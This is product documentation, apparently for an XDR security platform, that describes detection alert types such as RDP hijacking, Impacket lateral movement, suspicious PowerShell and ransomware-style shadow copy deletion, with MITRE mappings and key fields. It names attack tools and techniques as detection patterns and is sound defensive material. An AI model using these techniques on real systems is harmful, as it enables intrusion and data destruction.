-
Tactic: Execution (TA0002 )
-
Technique: Command and Scripting Interpreter (T1059 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is powershell_cnc
.
Key Fields and Relevant Data Points
srcip
— source IP address of the Windows hostremote_ip
— IP address of the remote host involved in the scriptevent_data.ScriptBlockText
— contents of the PowerShell script
Use Case with Data Points
If a Windows host (srcip
) executes a PowerShell script that includes potential communication (event_data.ScriptBlockText
) with a remote host (remote_ip
), an alert is triggered. The Interflow includes the IP address of the Windows host (srcip
), the script body (event_data.ScriptBlockText
), and the remote host IP address (remote_ip
).
Process Anomaly
A process has been launched an anomalously large number of times. Investigate the process and the user to see if this is expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: XDR EBA (XTA0001)
-
Technique: XDR Process Anomaly (XT1001)
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is bad_process
.
Key Fields and Relevant Data Points
process_name
— name of the processhostip
— host IP addresshostip_host
— host nameactual
— actual number of launches in the periodtypical
— typical number of launches in the periodprocess_user
— user who launched the process
Use Case with Data Points
The number of times a process (process_name
) has been launched is calculated periodically. If the volume (actual
) is much larger than the typical volume (typical
) of the command or other commands in any period, an alert is triggered. The Interflow includes the name of the user who launched the process (process_user
).
RDP Port Opening
Netsh commands to open TCP port 3389 were detected. This could indicate Sarwent malware attempting to establish an RDP connection. Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Defense Evasion (TA0005 )
-
Technique: Impair Defenses (T1562 )
-
Tags: [RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is rdp_port_opening
.
Key Fields and Relevant Data Points
hostip
— source IP address that executes the commandevent_data.CommandLine
— command that was executedprocess_name
— process name
Use Case with Data Points
Commands that open TCP port 3389 are monitored, and if netsh commands are seen, an alert is triggered. A sample Interflow includes the source IP address (hostip
) and the command used (event_data.CommandLine
).
RDP Registry Modification
Modifications of the property values of fDenyTSConnections
and UserAuthentication
to enable remote desktop connections were detected. Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Defense Evasion (TA0005 )
-
Technique: Modify Registry (T1112 )
-
Tags: [RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is rdp_registry_modification
.
Key Fields and Relevant Data Points
hostip
— host IP addressevent_data.TargetObject
— name of the registry keyevent_data.Details
— value of the registry
Use Case with Data Points
The property values of fDenyTSConnections
and UserAuthentication
are monitored, and if a possible malicious modification of the settings to enable remote desktop connections is observed, an alert is triggered. A sample Interflow includes the source IP address (hostip
) and the registry name (event_data.TargetObject
).
RDP Reverse Tunnel
An svchost
hosting RDP termsvcs
communicating with the loopback address on TCP port 3389 was detected. Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Command and Control (TA0011 )
-
Technique: Protocol Tunneling (T1572 )
-
Tags: [RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is rdp_reverse_tunnel
.
Key Fields and Relevant Data Points
hostip
— host IP addresshostip_host
— host nameevent_data.Image
— process communicating with the loopback address
Use Case with Data Points
If an svchost hosting RDP termsvcs communicating with the loopback address is found on TCP port 3389, an alert is triggered. A sample Interflow includes the host IP address (hostip
) and host name (hostip_host
).
RDP Session Hijacking
A suspicious RDP session using tscon.exe or MSTSC shadowing was detected. This could indicate a hijacked RDP session. Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: Lateral Movement (TA0008 )
-
Technique: Remote Service Session Hijacking (T1563 )
-
Tags: [RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is rdp_session_hijacking
.
Key Fields and Relevant Data Points
hostip
— host IP address that executes the commandevent_data.CommandLine
— command executedprocess_name
— process name
Use Case with Data Points
If an RDP session redirect using tscon.exe or MSTSC is detected, an alert is triggered. A sample Interflow includes the host IP address (hostip
), name of the process used (process_name
), and command used (event_data.CommandLine
).
RDP Settings Hijacking
Changes to RDP terminal services settings were detected. Check the IP address and block if necessary.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Defense Evasion (TA0005 )
-
Technique: Modify Registry (T1112 )
-
Tags: [RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is rdp_settings_hijack
.
Key Fields and Relevant Data Points
hostip
— IP of the host that made the setting changeevent_data.TargetObject
— name of the registry key-
event_data.EventType
— event type on the registry key event_data.Details
— value of the registry
Use Case with Data Points
RDP terminal service settings are monitored, and if changes are found to these settings, an alert is triggered. A sample Interflow includes the source IP address (hostip
) and the registry name (event_data.TargetObject
).
RDP Suspicious Logon
An RDP logon with a local source IP address was detected. This could indicate a tunneled logon. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Command and Control (TA0011 )
-
Technique: Protocol Tunneling (T1572 )
-
Tags: [RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is rdp_suspicious_logon
.
Key Fields and Relevant Data Points
hostip
— host IP address of the RDP serverevent_data.TargetDomainName
— domain of the login accountevent_data.TargetUserName
— user name of the login accounthostip_host
— host name of the RDP server
Use Case with Data Points
Remote desktop logins are monitored, and if a local source IP address is seen, an alert is triggered. A sample Interflow includes the source IP address (hostip
) and host name (hostip_host
).
RDP Suspicious Logon Attempt
An authenticated user who is not allowed to log on remotely attempted to connect through RDP. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] Credential Access (TA0006 )
-
Technique: Brute Force (T1110 )
-
Tags: [Internal; RDP]
Event Name
The xdr_event.name
for this alert type in the Interflow data is rdp_suspicious_logon_attempt
.
Key Fields and Relevant Data Points
hostip
— host IP address of the RDP serverevent_data.AccountDomain
— account domain of the user trying to connectevent_data.ClientAddress
— IP address of the user trying to connectevent_data.AccountName
— account name of the user trying to connecthostip_host
— host name of the RDP server
Use Case with Data Points
Windows remote desktop logins are monitored, and if a user who is not allowed to remotely log in tries to log in with RDP, an alert is triggered. A sample Interflow includes the source IP address (hostip
) and host name (hostip_host
).
Sensitive Windows Active Directory Attribute Modification
The Sensitive Windows Active Directory Attribute Modification rules are used to identify suspicious activity with Sensitive Windows Active Directory Attribute Modification. Any one or more of these will trigger the Sensitive Windows Active Directory Attribute Modification alert type.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_ad_sensitive_attribute_modification
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Sensitive Windows Active Directory Attribute Modification Alert Type
Sensitive Windows Network Share File or Folder Accessed
The Sensitive Windows Network Share File or Folder Accessed rules are used to identify suspicious activity with Windows Network Share File or Folder Access. Any one or more of these will trigger the Sensitive Windows Network Share File or Folder Accessed alert type.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_sensitive_networkshare
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Sensitive Windows Network Share File or Folder Accessed Alert Type
SMB Impacket Lateralization
The execution of wmiexec, dcomexec, atexec, smbexec or PSExec
from the Impacket framework was detected. Check the source host. If malicious, consider blocking the host.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Execution (TA0002 )
-
Technique: Windows Management Instrumentation (T1047 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is smb_impacket_lateralization
.
Key Fields and Relevant Data Points
srcip
— source IP addresssrcip_host
— host name of corresponding source IP addressevent_data.CommandLine
— command that was executedevent_data.ParentCommandLine
— command line of the parent process
Use Case with Data Points
If a Windows host (srcip
) executes a command (wmiexec, dcomexec, atexec, smbexec
, or PSExec
) from the Impacket framework, an alert is triggered. A sample Interflow includes the source IP address (srcip
), source host (srcip_host
), and the command executed (event_data.CommandLine
).
SMB Specific Service Installation
A specific service installation used by the smbexec.py
tool was detected. Check the source host. If malicious, consider blocking the host.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: Execution (TA0002 )
-
Technique: System Services (T1569 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is smb_hack_smbexec
.
Key Fields and Relevant Data Points
srcip
— source IP addressevent_data.ServiceName
— name of the service installedsrcip_host
— host name of corresponding source IP address
Use Case with Data Points
If a Windows host (srcip
) installs a specific service installation that is used by the smbexec.py
tool, an alert is triggered. A sample Interflow includes the source IP address (srcip
), source host (srcip_host
), and the service installed (event_data.ServiceName
).
SMB Suspicious Copy
A suspicious copy command from a remote C$ or ADMIN$ share was detected. Check the source host. If malicious, consider blocking the host.
XDR Kill Chain
-
Kill Chain Stage: Exploration
-
Tactic: Collection (TA0009 )
-
Technique: Data from Network Shared Drive (T1039 )
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is smb_suspicious_copy
.
Key Fields and Relevant Data Points
srcip
— source IP addresssrcip_host
— host name of corresponding source IP addressevent_data.CommandLine
— copy command used
Use Case with Data Points
If a Windows host (srcip
) uses the copy command to copy files from a remote C$ or ADMIN$ share, an alert is triggered. A sample Interflow includes the source IP address (srcip
), source host (srcip_host
), and the command executed (event_data.CommandLine
).
Suspicious Access Attempt to Windows Object
The Suspicious Access Attempt to Windows Object rules are used to identify suspicious activity with Access Attempt to Windows Objects. Any one or more of these will trigger the Suspicious Access Attempt to Windows Object alert type.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_object_access_suspicious_attempt
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Access Attempt to Windows Object Alert Type
Suspicious Activity Related to Security-Enabled Group
The Suspicious Activity Related to Security-Enabled Group rules are used to identify suspicious activity related to security-enabled groups. Any one or more of these will trigger the Suspicious Activity Related to Security-Enabled Group alert types.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_suspicious_activity_related_to_security_enabled_group
.
Key Fields and Relevant Data Points
hostip
— host IP addressevent_id
— Windows event ID associated with the activityhostip_host
— host nameevent_data.SubjectUserName
— subject user name associated with the activityevent_data.SubjectUserSid
— subject user SID associated with the activitystellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Activity Related to Security-Enabled Group Alert Type
Suspicious Connection to Another Process
The Suspicious Connection to Another Process rules are used to identify suspicious activity with Suspicious Connection to Another Process. Any one or more of these will trigger the Suspicious Connection to Another Process alert types.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_suspicious_connection_process
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Connection to Another Process Alert Type
Suspicious Handle Request to Sensitive Object
The Suspicious Handle Request to Sensitive Object rules are used to identify suspicious activity with Handle Requests to Sensitive Objects. Any one or more of these will trigger the Suspicious Handle Request to Sensitive Object alert type.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_suspicious_handle_request
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Handle Request to Sensitive Object Alert Type
Suspicious Powershell Script
The Suspicious Powershell Script rules are used to identify suspicious activity relating to PowerShell scripts. Any one or more of these will trigger the Suspicious PowerShell Script alert types.
Event Name
The xdr_event.name
for this alert type in the Interflow data is suspicious_powershell_script
.
Key Fields and Relevant Data Points
hostip
— host IP addresshostip_host
— host namewineventlog_user
— Windows user who executed the scriptevent_data.ScriptBlockText
— Powershell script block textstellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Powershell Script Alert Type
Suspicious Process Creation Commandline
The Suspicious Process Creation Commandline rules are used to identify suspicious activity relating to command-line process creation. Any one or more of these will trigger the Suspicious Process Creation Commandline alert types.
Event Name
The xdr_event.name
for this alert type in the Interflow data is suspicious_commandline
.
Key Fields and Relevant Data Points
hostip
— host IP addressevent_data.CommandLine
— process creation command linehostip_host
— host namewineventlog_user
— Windows user who executed the commandstellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Process Creation Commandline Alert Type
Suspicious Windows Active Directory Operation
The Suspicious Windows Active Directory Operation rules are used to identify suspicious activity with Windows Active Directory Operation. Any one or more of these will trigger the Suspicious Windows Active Directory Operation alert type.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_ad_suspicious_operation
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Windows Active Directory Operation Alert Type
Suspicious Windows Logon Event
The Suspicious Windows Logon Event rules are used to identify suspicious activity with Windows Logons. Any one or more of these will trigger the Suspicious Windows Logon alert types.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_suspicious_logon_event
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Windows Logon Event Alert Type
Suspicious Windows Process Creation
The Suspicious Windows Process Creation rules are used to identify suspicious activity associated with process creation. Any one or more of these will trigger the Suspicious Process Creation alert type.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_suspicious_process_creation
.
Key Fields and Relevant Data Points
hostip
— host IP addressprocess_name
— process associated with the activityhostip_host
— host namewineventlog_user
— Windows user associated with the activitystellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Windows Suspicious Process Creation Alert Type
Suspicious Windows Service Installation
The Suspicious Windows Service Installation rules are used to identify suspicious activity with service installation. Any one or more of these will trigger the Suspicious Windows Service Installation alert type.
Event Name
The xdr_event.name
for this alert type in the Interflow data is windows_security_suspicious_service_installation
.
Key Fields and Relevant Data Points
event_id
— Windows event ID associated with the activityhostip
— host IP addresshostip_host
— host namestellar.rule_id
— Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Windows Service Installation Alert Type
Uncommon Process Anomaly
An asset launched a process that has never been observed by Stellar Cyber (or been seen very rarely). This could indicate a malware attack.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: XDR EBA (XTA0001)
-
Technique: XDR Process Anomaly (XT1001)
-
Tags: []
Event Name
The xdr_event.name
for this alert type in the Interflow data is network_uncommon_process
.
Key Fields and Relevant Data Points
process_name
— name of the processdays_silent
— number of days since this process was last seensrcip
— source IP address running the processprocess_user
— name of the user running the process
Use Case with Data Points
If a process (process_name
) has never been observed by Stellar Cyber or been seen very rarely (days_silent
), an alert is triggered. The Interflow includes the user (process_user
) and host (srcip
) that executed the process.
User Asset Access Anomaly
A user who typically uses a small, consistent number of assets logged in to a new asset. Investigate the asset and user to see if this was expected.
XDR Kill Chain
-
Kill Chain Stage: Propagation
-
Tactic: [Internal] XDR UBA (XTA0004)
-
Technique: XDR Asset Anomaly (XT4004)
-
Tags: [Internal; User Behavior Analytics]
Event Name
The xdr_event.name
for this alert type in the Interflow data is user_asset_access
.
Key Fields and Relevant Data Points
srcip_usersid
— source user IDsrcip_host
— host name of corresponding source IP addressdstip_host
— host name of corresponding destination IP addresssrcip_username
— source user namestability
— score measuring the time since the last new asset was accesseddiversity
— score measuring the number of assets that the user accesseddays_stable
— time since the last new asset was accessedchild_count
— number of assets that the user accessed
Use Case with Data Points
Users (srcip_usersid
and srcip_username
) with a small number of assets (diversity
, child_count
) who also have not used a new asset (srcip_host
) for a long time (stability
, days_stable
) are examined. If a new asset appears on a host (srcip_host
) with this user, an alert is triggered.
The user is identified with the scrip_userid
and scrip_username
fields. The asset is identified with the scrip_host
field. Active Directory, which is identified from the dstip_host
field, provides the relationship between the user and the asset. Stability is identified with the stability
field and diversity is identified with the diversity
field.
User Login Location Anomaly
A user logged in from an anomalous location. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
-
Kill Chain Stage: Initial Attempts
-
Tactic: [External] XDR UBA (XTA0004)
-
Technique: XDR Location Anomaly (XT2001)
-
Tags: [External; User Behavior Analytics]
Event Name
The xdr_event.name
for this alert type in the Interflow data is user_login_region
.
Key Fields and Relevant Data Points
srcip_usersid
— source user IDdistance_deviation
— deviation in distance between two login locations (miles)srcip_host
— host name of corresponding source IP addresssrcip_reputation
— source reputationsrcip_geo.countryName
— source countrysrcip_geo.region
— source regionsrcip_geo.city
— source citydstip_host
— host name of corresponding destination IP addresslogin_type
— type of login
Use Case with Data Points
Successful login events for certain login types (login_type
) of a user (srcip_usersid
) from a source host (srcip_host
) and country location (srcip_geo.countryName
are examined. If the detected login location is too far away (distance_deviation
in miles) from that user's typical locations, an alert is triggered. The source host's reputation (srcip_reputation
) is also checked. Map views of the Interflow include data points for the closest typical
login locations for the user.
User Process Usage Anomaly
A user who typically executes a small, consistent number of processes suddenly executed a new process. Investigate the process, to see if it is benign. Check with the user to see if this process was expected.
XDR Kill Chain
-
Kill Chain Stage: Persistent Foothold
-
Tactic: XDR EBA (XTA0001)
-
Technique: XDR Process Anomaly (XT1001)
-
Tags: [User Behavior Analytics]
Event Name
The xdr_event.name
for this alert type in the Interflow data is user_uncommon_process
.
Key Fields and Relevant Data Points
srcip_usersid
— non-Windows source user IDor
user.identifier
— Windows source user IDThe key field for this alert type can be either
srcip_usersid
oruser.identifier
, depending on the data feed.process_name
— name of the processsrcip_host
— host name of corresponding source IP addressdstip_host
— host name of corresponding destination IP addresssrcip_username
— source user namestability
— score measuring the time since the last new process was executeddiversity
— score measuring the number of processes that the user executeddays_stable
— time since the last new process was executedchild_count
— number of processes that the user executed
Use Case with Data Points
Looks for a user (srcip_usersid
or user.identifier
and a srcip_username
) with a small number of processes (diversity
, child_count
) who also has not used a new process for a long time (stability
, days_stable
). If a new process (process_name
) appears on a host (srcip_host
) with this user and connects to another host (dstip_host
), an alert is triggered.
The user is identified with the scrip_userid
or user.identifier
and scrip_username
fields. The process is identified with the process_name
field. The host on which the user is running the process is identified with the srcip_host
field. The destination of the traffic generated by the process is identified with the dstip_host
field. Stability is identified with the stability
field, and diversity is identified with the diversity
field.
Volume Shadow Copy Deletion via WMIC
The wmic.exe
utility was used to delete the Shadow Copy on an endpoint. Ransomware and other malware do this to prevent system recovery. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Exfiltration & Impact
-
Tactic: Impact (TA0040 )
-
Technique: Inhibit System Recovery (T1490 )
-
Tags: [Malware; Ransomware]
Event Name
The xdr_event.name
for this alert type in the Interflow data is ransomware_volume_shadow_copy_deletion_via_wmicredit
.
Key Fields and Relevant Data Points
hostip
— IP address of the host where the Shadow Copy was deletedprocess_name
— name of the processevent_data.CommandLine
— command that was executed
Use Case with Data Points
If wmic.exe
is used to delete the Shadow Copy on an endpoint, an alert is triggered. The Interflow includes the host IP address (hostip
), process name (process_name
), and command line (event_data.CommandLine
).
Volume Shadow Copy Deletion via VssAdmin
The vssadmin.exe
utility was used to delete the Shadow Copy on an endpoint. Ransomware and other malware do this to prevent system recovery. Check with the user.
XDR Kill Chain
-
Kill Chain Stage: Exfiltration & Impact
-
Tactic: Impact (TA0040 )
-
Technique: Inhibit System Recovery (T1490 )
-
Tags: [Malware; Ransomware]
Event Name
The xdr_event.name
for this alert type in the Interflow data is ransomware_volume_shadow_copy_deletion_via_vssadminedit
.
Key Fields and Relevant Data Points
hostip
— IP address of the host where the Shadow Copy was deletedprocess_name
— name of the processevent_data.CommandLine
— command that was executed
Use Case with Data Points
If vssadmin.exe
is used to delete the Shadow Copy on an endpoint, an alert is triggered. The Interflow ibncludes the host IP address (hostip
), process name (process_name
), and command line (event_data.CommandLine
).